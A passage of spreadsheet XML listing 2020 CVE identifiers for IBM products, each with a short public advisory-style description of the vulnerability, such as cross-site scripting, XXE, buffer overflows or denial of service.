    <t>IBM Spectrum Scale 5.0.0.0 through 5.0.4.4 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 178423.</t>
  </si>
  <si>
    <t>CVE-2020-4350</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0.0 through 5.0.4.4 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 178424.</t>
  </si>
  <si>
    <t>CVE-2020-4352</t>
  </si>
  <si>
    <t>IBM MQ on HPE NonStop 8.0.4 and 8.1.0 is vulnerable to a privilege escalation attack when running in restricted mode. IBM X-Force ID: 178427.</t>
  </si>
  <si>
    <t>CVE-2020-4353</t>
  </si>
  <si>
    <t>IBM MaaS360 6.82 could allow a user with pysical access to the device to crash the application which may enable the user to access restricted applications and device settings. IBM X-Force ID: 178505.</t>
  </si>
  <si>
    <t>CVE-2020-4354</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.0 and 11.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 178506.</t>
  </si>
  <si>
    <t>CVE-2020-4355</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a denial of service, caused by improper handling of Secure Sockets Layer (SSL) renegotiation requests. By sending specially-crafted requests, a remote attacker could exploit this vulnerability to increase the resource usage on the system. IBM X-Force ID: 178507.</t>
  </si>
  <si>
    <t>CVE-2020-4357</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0.0 through 5.0.4.4 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 178761.</t>
  </si>
  <si>
    <t>CVE-2020-4358</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0.0 through 5.0.4.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 178762.</t>
  </si>
  <si>
    <t>CVE-2020-4360</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 178765.</t>
  </si>
  <si>
    <t>CVE-2020-4361</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could allow a remote attacker to obtain sensitive information by disclosing private IP addresses in HTTP responses. IBM X-Force ID: 178766.</t>
  </si>
  <si>
    <t>CVE-2020-4362</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional is vulnerable to a privilege escalation vulnerability when using token-based authentication in an admin request over the SOAP connector. IBM X-Force ID: 178929.</t>
  </si>
  <si>
    <t>CVE-2020-4363</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code on the system with root privileges. IBM X-Force ID: 178960.</t>
  </si>
  <si>
    <t>CVE-2020-4364</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 178961.</t>
  </si>
  <si>
    <t>CVE-2020-4365</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 8.5 is vulnerable to server-side request forgery. By sending a specially crafted request, a remote authenticated attacker could exploit this vulnerability to obtain sensitive data. IBM X-Force ID: 178964.</t>
  </si>
  <si>
    <t>CVE-2020-4366</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 178965.</t>
  </si>
  <si>
    <t>CVE-2020-4367</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 179001.</t>
  </si>
  <si>
    <t>CVE-2020-4369</t>
  </si>
  <si>
    <t>IBM Verify Gateway (IVG) 1.0.0 and 1.0.1 stores highly sensitive information in cleartext that could be obtained by a user. IBM X-Force ID: 179004.</t>
  </si>
  <si>
    <t>CVE-2020-4371</t>
  </si>
  <si>
    <t>IBM Verify Gateway (IVG) 1.0.0 and 1.0.1 contains sensitive information in leftover debug code that could be used aid a local user in further attacks against the system. IBM X-Force ID: 179008.</t>
  </si>
  <si>
    <t>CVE-2020-4372</t>
  </si>
  <si>
    <t>IBM Verify Gateway (IVG) 1.0.0 and 1.0.1 stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 179009</t>
  </si>
  <si>
    <t>CVE-2020-4375</t>
  </si>
  <si>
    <t>IBM MQ, IBM MQ Appliance, IBM MQ for HPE NonStop 8.0, 9.1 CD, and 9.1 LTS could allow an attacker to cause a denial of service due to a memory leak caused by an error creating a dynamic queue. IBM X-Force ID: 179080.</t>
  </si>
  <si>
    <t>CVE-2020-4376</t>
  </si>
  <si>
    <t>IBM MQ, IBM MQ Appliance, IBM MQ for HPE NonStop 8.0.4 and 8.1.0 could allow an attacker to cause a denial of service caused by an error within the pubsub logic. IBM X-Force ID: 179081.</t>
  </si>
  <si>
    <t>CVE-2020-4377</t>
  </si>
  <si>
    <t>IBM Cognos Anaytics 11.0 and 11.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 179156.</t>
  </si>
  <si>
    <t>CVE-2020-4378</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0.0 through 5.0.4.4 could allow a privileged authenticated user to perform unauthorized actions using a specially crated HTTP POST command. IBM X-Force ID: 179157.</t>
  </si>
  <si>
    <t>CVE-2020-4379</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0.0 through 5.0.4.4 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 179158.</t>
  </si>
  <si>
    <t>CVE-2020-4380</t>
  </si>
  <si>
    <t>IBM Workload Scheduler 9.3.0.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 179160.</t>
  </si>
  <si>
    <t>CVE-2020-4381</t>
  </si>
  <si>
    <t>IBM Spectrum Scale for IBM Elastic Storage Server 5.3.0 through 5.3.6 could allow an authenticated user to cause a denial of service during deployment or upgrade if GUI specific services are enabled. IBM X-Force ID: 179162.</t>
  </si>
  <si>
    <t>CVE-2020-4382</t>
  </si>
  <si>
    <t>IBM Spectrum Scale for IBM Elastic Storage Server 5.3.0 through 5.3.5 could allow an authenticated user to cause a denial of service during deployment or upgrade pertaining to xcat services. IBM X-Force ID: 179163.</t>
  </si>
  <si>
    <t>CVE-2020-4383</t>
  </si>
  <si>
    <t>IBM Spectrum Scale for IBM Elastic Storage Server 5.3.0 through 5.3.5 could allow an authenticated user to cause a denial of service during deployment while configuring some of the network services. IBM X-Force ID: 179165.</t>
  </si>
  <si>
    <t>CVE-2020-4384</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 179265.</t>
  </si>
  <si>
    <t>CVE-2020-4385</t>
  </si>
  <si>
    <t>IBM Verify Gateway (IVG) 1.0.0 and 1.0.1 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 179266.</t>
  </si>
  <si>
    <t>CVE-2020-4386</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a local user to obtain sensitive information using a race condition of a symbolic link. IBM X-Force ID: 179268.</t>
  </si>
  <si>
    <t>CVE-2020-4387</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a local user to obtain sensitive information using a race condition of a symbolic link. IBM X-Force ID: 179269.</t>
  </si>
  <si>
    <t>CVE-2020-4388</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.0 and 11.1 could be vulnerable to a denial of service attack by failing to catch exceptions in a servlet also exposing debug information could also be used in future attacks. IBM X-Force ID: 179270.</t>
  </si>
  <si>
    <t>CVE-2020-4395</t>
  </si>
  <si>
    <t>IBM Security Access Manager Appliance 9.0.7 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 179358.</t>
  </si>
  <si>
    <t>CVE-2020-4396</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 179359.</t>
  </si>
  <si>
    <t>CVE-2020-4397</t>
  </si>
  <si>
    <t>IBM Verify Gateway (IVG) 1.0.0 and 1.0.1 transmits sensitive information in plain text which could be obtained by an attacker using man in the middle techniques. IBM X-Force ID: 179428.</t>
  </si>
  <si>
    <t>CVE-2020-4399</t>
  </si>
  <si>
    <t>IBM Verify Gateway (IVG) 1.0.0 and 1.0.1 could allow an authenticated user to send malformed requests to cause a denial of service against the server. IBM X-Force ID: 179476.</t>
  </si>
  <si>
    <t>CVE-2020-4400</t>
  </si>
  <si>
    <t>IBM Verify Gateway (IVG) 1.0.0 and 1.0.1 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 179478.</t>
  </si>
  <si>
    <t>CVE-2020-4405</t>
  </si>
  <si>
    <t>IBM Verify Gateway (IVG) 1.0.0 and 1.0.1 could disclose potentially sensitive information to an authenticated user due to world readable log files. IBM X-Force ID: 179484.</t>
  </si>
  <si>
    <t>CVE-2020-4406</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Client 8.1.7.0 through 8.1.9.1 (Linux and Windows), 8.1.9.0 trough 8.1.9.1 (AIX) and IBM Spectrum Protect for Space Management 8.1.7.0 through 8.1.9.1 (Linux), 8.1.9.0 through 8.1.9.1 (AIX) web user interfaces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79488.</t>
  </si>
  <si>
    <t>CVE-2020-4408</t>
  </si>
  <si>
    <t>The IBM QRadar Advisor 1.1 through 2.5.2 with Watson App for IBM QRadar SIEM does not adequately mask all passwords during input, which could be obtained by a physical attacker nearby. IBM X-Force ID: 179536.</t>
  </si>
  <si>
    <t>CVE-2020-4409</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0 and 7.6.1 could allow a remote attacker to conduct phishing attacks, using a tabnabbing attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 179537.</t>
  </si>
  <si>
    <t>CVE-2020-4410</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products could allow an authenticated user to send a specially crafted HTTP GET request to read attachments on the server that they should not have access to. IBM X-Force ID: 179539.</t>
  </si>
  <si>
    <t>CVE-2020-4411</t>
  </si>
  <si>
    <t>The Spectrum Scale 4.2.0.0 through 4.2.3.21 and 5.0.0.0 through 5.0.4.3 file system component is affected by a denial of service vulnerability in its kernel module that could allow an attacker to cause a denial of service condition on the affected system. To exploit this vulnerability, a local attacker could invoke a subset of ioctls on the Spectrum Scale device with non-valid arguments. This could allow the attacker to crash the kernel. IBM X-Force ID: 179986.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-4412</t>
  </si>
  <si>
    <t>The Spectrum Scale 4.2.0.0 through 4.2.3.21 and 5.0.0.0 through 5.0.4.3 file system component is affected by a denial of service security vulnerability. An attacker can force the Spectrum Scale mmfsd/mmsdrserv daemons to unexpectedly exit, impacting the functionality of the Spectrum Scale cluster and the availability of file systems managed by Spectrum Scale. IBM X-Force ID: 179987.</t>
  </si>
  <si>
    <t>CVE-2020-4413</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.7 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 179988.</t>
  </si>
  <si>
    <t>CVE-2020-4414</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a local attacker to perform unauthorized actions on the system, caused by improper usage of shared memory. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information or cause a denial of service. IBM X-Force ID: 179989.</t>
  </si>
  <si>
    <t>CVE-2020-4415</t>
  </si>
  <si>
    <t>IBM Spectrum Protect 7.1 and 8.1 server is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. This could allow a remote attacker to execute arbitrary code on the system with the privileges of an administrator or user associated with the Spectrum Protect server or cause the Spectrum Protect server to crash. IBM X-Force ID: 179990.</t>
  </si>
  <si>
    <t>CVE-2020-4419</t>
  </si>
  <si>
    <t>IBM Jazz Reporting Service 6.0.6, 6.0.6.1, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 180071.</t>
  </si>
  <si>
    <t>CVE-2020-4420</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow an unauthenticated attacker to cause a denial of service due a hang in the execution of a terminate command. IBM X-Force ID: 180076.</t>
  </si>
  <si>
    <t>CVE-2020-4421</t>
  </si>
  <si>
    <t>IBM WebSphere Application Liberty 19.0.0.5 through 20.0.0.4 could allow an authenticated user using openidconnect to spoof another users identify. IBM X-Force ID: 180084.</t>
  </si>
  <si>
    <t>CVE-2020-4422</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 180167.</t>
  </si>
  <si>
    <t>CVE-2020-4427</t>
  </si>
  <si>
    <t>IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 could allow a remote attacker to bypass security restrictions when configured with SAML authentication. By sending a specially crafted HTTP request, an attacker could exploit this vulnerability to bypass the authentication process and gain full administrative access to the system. IBM X-Force ID: 180532.</t>
  </si>
  <si>
    <t>CVE-2020-4428</t>
  </si>
  <si>
    <t>IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, and 2.0.4 could allow a remote authenticated attacker to execute arbitrary commands on the system. IBM X-Force ID: 180533.</t>
  </si>
  <si>
    <t>CVE-2020-4429</t>
  </si>
  <si>
    <t>IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 contains a default password for an IDRM administrative account. A remote attacker could exploit this vulnerability to login and execute arbitrary code on the system with root privileges. IBM X-Force ID: 180534.</t>
  </si>
  <si>
    <t>CVE-2020-4430</t>
  </si>
  <si>
    <t>IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, and 2.0.4 could allow a remote authenticated attacker to traverse directories on the system. An attacker could send a specially-crafted URL request to download arbitrary files from the system. IBM X-Force ID: 180535.</t>
  </si>
  <si>
    <t>CVE-2020-4431</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 180761.</t>
  </si>
  <si>
    <t>CVE-2020-4432</t>
  </si>
  <si>
    <t>Certain IBM Aspera applications are vulnerable to command injection after valid authentication, which could allow an attacker with intimate knowledge of the system to execute commands in a SOAP API. IBM X-Force ID: 180810.</t>
  </si>
  <si>
    <t>CVE-2020-4433</t>
  </si>
  <si>
    <t>Certain IBM Aspera applications are vulnerable to a stack-based buffer overflow, caused by improper bounds checking. This could allow a remote attacker with intimate knowledge of the server to execute arbitrary code on the system with the privileges of root or cause server to crash. IBM X-Force ID: 180814.</t>
  </si>
  <si>
    <t>CVE-2020-4434</t>
  </si>
  <si>
    <t>Certain IBM Aspera applications are vulnerable to buffer overflow based on the product configuration and valid authentication, which could allow an attacker with intimate knowledge of the system to execute arbitrary code or perform a denial-of-service (DoS) through the http fallback service. IBM X-Force ID: 180900.</t>
  </si>
  <si>
    <t>CVE-2020-4435</t>
  </si>
  <si>
    <t>Certain IBM Aspera applications are vulnerable to arbitrary memory corruption based on the product configuration, which could allow an attacker with intimate knowledge of the system to execute arbitrary code or perform a denial-of-service (DoS) through the http fallback service. IBM X-Force ID: 180901.</t>
  </si>
  <si>
    <t>CVE-2020-4436</t>
  </si>
  <si>
    <t>Certain IBM Aspera applications are vulnerable to buffer overflow after valid authentication, which could allow an attacker with intimate knowledge of the system to execute arbitrary code through a service. IBM X-Force ID: 180902.</t>
  </si>
  <si>
    <t>CVE-2020-4445</t>
  </si>
  <si>
    <t>IBM Jazz Team Server based Applications are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 181122.</t>
  </si>
  <si>
    <t>CVE-2020-4446</t>
  </si>
  <si>
    <t>IBM Business Process Manager 8.0, 8.5, and 8.6 and IBM Business Automation Workflow 18.0 and 19.0 could allow a remote attacker to bypass security restrictions, caused by the failure to perform insufficient authorization checks. IBM X-Force ID: 181126.</t>
  </si>
  <si>
    <t>CVE-2020-4447</t>
  </si>
  <si>
    <t>IBM FileNet Content Manager 5.5.3 and 5.5.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 181227.</t>
  </si>
  <si>
    <t>CVE-2020-4448</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server Network Deployment 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to execute arbitrary code on the system with a specially-crafted sequence of serialized objects from untrusted sources. IBM X-Force ID: 181228.</t>
  </si>
  <si>
    <t>CVE-2020-4449</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional could allow a remote attacker to obtain sensitive information with a specially-crafted sequence of serialized objects. IBM X-Force ID: 181230.</t>
  </si>
  <si>
    <t>CVE-2020-4450</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 8.5 and 9.0 traditional could allow a remote attacker to execute arbitrary code on the system with a specially-crafted sequence of serialized objects. IBM X-Force ID: 181231.</t>
  </si>
  <si>
    <t>CVE-2020-4452</t>
  </si>
  <si>
    <t>IBM API Connect V2018.4.1.0 through 2018.4.1.11 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 181324.</t>
  </si>
  <si>
    <t>CVE-2020-4459</t>
  </si>
  <si>
    <t>IBM Security Verify Access 10.7 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 181395.</t>
  </si>
  <si>
    <t>CVE-2020-4461</t>
  </si>
  <si>
    <t>IBM Security Access Manager Appliance 9.0.7.1 could allow an authenticated user to bypass security by allowing id_token claims manipulation without verification. IBM X-Force ID: 181481.</t>
  </si>
  <si>
    <t>CVE-2020-4462</t>
  </si>
  <si>
    <t>IBM Sterling External Authentication Server 6.0.1, 6.0.0, 2.4.3.2, and 2.4.2 and IBM Sterling Secure Proxy 6.0.1, 6.0.0, 3.4.3, and 3.4.2 are vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 181482.</t>
  </si>
  <si>
    <t>CVE-2020-4463</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0.1 and 7.6.0.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 181484.</t>
  </si>
  <si>
    <t>CVE-2020-4464</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional could allow a remote attacker to execute arbitrary code on a system with a specially-crafted sequence of serialized objects over the SOAP connector. IBM X-Force ID: 181489.</t>
  </si>
  <si>
    <t>CVE-2020-4465</t>
  </si>
  <si>
    <t>IBM MQ, IBM MQ Appliance, and IBM MQ for HPE NonStop 8.0, 9.1 CD, and 9.1 LTS is vulnerable to a buffer overflow vulnerability due to an error within the channel processing code. A remote attacker could overflow the buffer using an older client and cause a denial of service. IBM X-Force ID: 181562.</t>
  </si>
  <si>
    <t>CVE-2020-4466</t>
  </si>
  <si>
    <t>IBM MQ for HPE NonStop 8.0.4 and 8.1.0 could allow a remote authenticated attacker could cause a denial of service due to an error within the Queue processing function. IBM X-Force ID: 181563.</t>
  </si>
  <si>
    <t>CVE-2020-4467</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by memory corruption. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 181721.</t>
  </si>
  <si>
    <t>CVE-2020-4468</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by memory corruption. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 181723.</t>
  </si>
  <si>
    <t>CVE-2020-4469</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow a remote attacker to execute arbitrary code on the system. By using a specially crafted HTTP command, an attacker could exploit this vulnerability to execute arbitrary command on the system. This vulnerability is due to an incomplete fix for CVE-2020-4211. IBM X-Force ID: 181724.</t>
  </si>
  <si>
    <t>CVE-2020-4470</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 Administrative Console could allow an authenticated attacker to upload arbitrary files which could be execute arbitrary code on the vulnerable server. IBM X-Force ID: 181725.</t>
  </si>
  <si>
    <t>CVE-2020-4471</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow an unauthenticated attacker to cause a denial of service or hijack DNS sessions by send a specially crafted HTTP command to the remote server. IBM X-Force ID: 181726.</t>
  </si>
  <si>
    <t>CVE-2020-4475</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 5.2.6.5 and 6.0.0.0 through 6.0.3.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.</t>
  </si>
  <si>
    <t>CVE-2020-4476</t>
  </si>
  <si>
    <t>IBM Sterling File Gateway 2.2.0.0 through 2.2.6.5 and 6.0.0.0 through 6.0.3.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 181778.</t>
  </si>
  <si>
    <t>CVE-2020-4477</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 discloses highly sensitive information in plain text in the virgo log file which could be used in further attacks against the system. IBM X-Force ID: 181779.</t>
  </si>
  <si>
    <t>CVE-2020-4481</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 181848.</t>
  </si>
  <si>
    <t>CVE-2020-4482</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could allow an authenticated user to bypass security. A user with access to a snapshot could apply unauthorized additional statuses via direct rest calls. IBM X-Force ID: 181856.</t>
  </si>
  <si>
    <t>CVE-2020-4483</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 181857.</t>
  </si>
  <si>
    <t>CVE-2020-4484</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could disclose sensitive information to an authenticated user that could be used in further attacks against the system. IBM X-Force ID: 181858.</t>
  </si>
  <si>
    <t>CVE-2020-4485</t>
  </si>
  <si>
    <t>IBM QRadar 7.2.0 through 7.2.9 could allow an authenticated user to disable the Wincollect service which could aid an attacker in bypassing security mechanisms in future attacks. IBM X-Force ID: 181860.</t>
  </si>
  <si>
    <t>CVE-2020-4486</t>
  </si>
  <si>
    <t>IBM QRadar 7.2.0 thorugh 7.2.9 could allow an authenticated user to overwrite or delete arbitrary files due to a flaw after WinCollect installation. IBM X-Force ID: 181861.</t>
  </si>
  <si>
    <t>CVE-2020-4487</t>
  </si>
  <si>
    <t>IBM Jazz Foundation Products could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 181862.</t>
  </si>
  <si>
    <t>CVE-2020-4490</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18 and 19, and IBM Business Process Manager 8.0, 8.5, and 8.6 could allow a remote attacker to bypass security restrictions, caused by a reverse tabnabbing flaw. An attacker could exploit this vulnerability and redirect a vitcim to a phishing site. IBM X-Force ID: 181989</t>
  </si>
  <si>
    <t>CVE-2020-4491</t>
  </si>
  <si>
    <t>IBM Spectrum Scale V4.2.0.0 through V4.2.3.22 and V5.0.0.0 through V5.0.5 could allow a local attacker to cause a denial of service by sending a large number of RPC requests to the mmfsd daemon which would cause the service to crash. IBM X-Force ID: 181991.</t>
  </si>
  <si>
    <t>CVE-2020-4492</t>
  </si>
  <si>
    <t>IBM Spectrum Scale V5.0.0.0 through V5.0.4.3 and V4.2.0.0 through V4.2.3.21 could allow a local attacker to cause a denial of service crashing the kernel by sending a subset of ioctls on the device with invalid arguments. IBM X-Force ID: 181992.</t>
  </si>
  <si>
    <t>CVE-2020-4493</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0 and 7.6.1 could allow an attacker to bypass authentication and issue commands using a specially crafted HTTP command. IBM X-Force ID: 181995.</t>
  </si>
  <si>
    <t>CVE-2020-4494</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Client 8.1.7.0 through 8.1.9.1 (Linux and Windows), 8.1.9.0 trough 8.1.9.1 (AIX) and IBM Spectrum Protect for Space Management 8.1.7.0 through 8.1.9.1 (Linux), 8.1.9.0 through 8.1.9.1 (AIX) web user interfaces could allow an attacker to bypass authentication due to improper session validation which can result in access to unauthorized resources. IBM X-Force ID: 182019.</t>
  </si>
  <si>
    <t>CVE-2020-4495</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products could allow a remote attacker to bypass security restrictions, caused by improper access control. By sending a specially-crafted request to the REST API, an attacker could exploit this vulnerability to bypass access restrictions, and execute arbitrary actions with administrative privileges. IBM X-Force ID: 182114.</t>
  </si>
  <si>
    <t>CVE-2020-4496</t>
  </si>
  <si>
    <t>The IBM Spectrum Protect Plus 10.1.0.0 through 10.1.8.x server connection to an IBM Spectrum Protect Plus workload agent is subject to a man-in-the-middle attack due to improper certificate validation. IBM X-Force ID: 182046.</t>
  </si>
  <si>
    <t>CVE-2020-4498</t>
  </si>
  <si>
    <t>IBM MQ Appliance 9.1 LTS and 9.1 CD could allow a local privileged user to obtain highly sensitve information due to inclusion of data within trace files. IBM X-Force ID: 182118.</t>
  </si>
  <si>
    <t>CVE-2020-4499</t>
  </si>
  <si>
    <t>IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an unauthorized public Oauth client to bypass some or all of the authentication checks and gain access to applications. IBM X-Force ID: 182216.</t>
  </si>
  <si>
    <t>CVE-2020-4503</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182283.</t>
  </si>
  <si>
    <t>CVE-2020-4509</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 182364.</t>
  </si>
  <si>
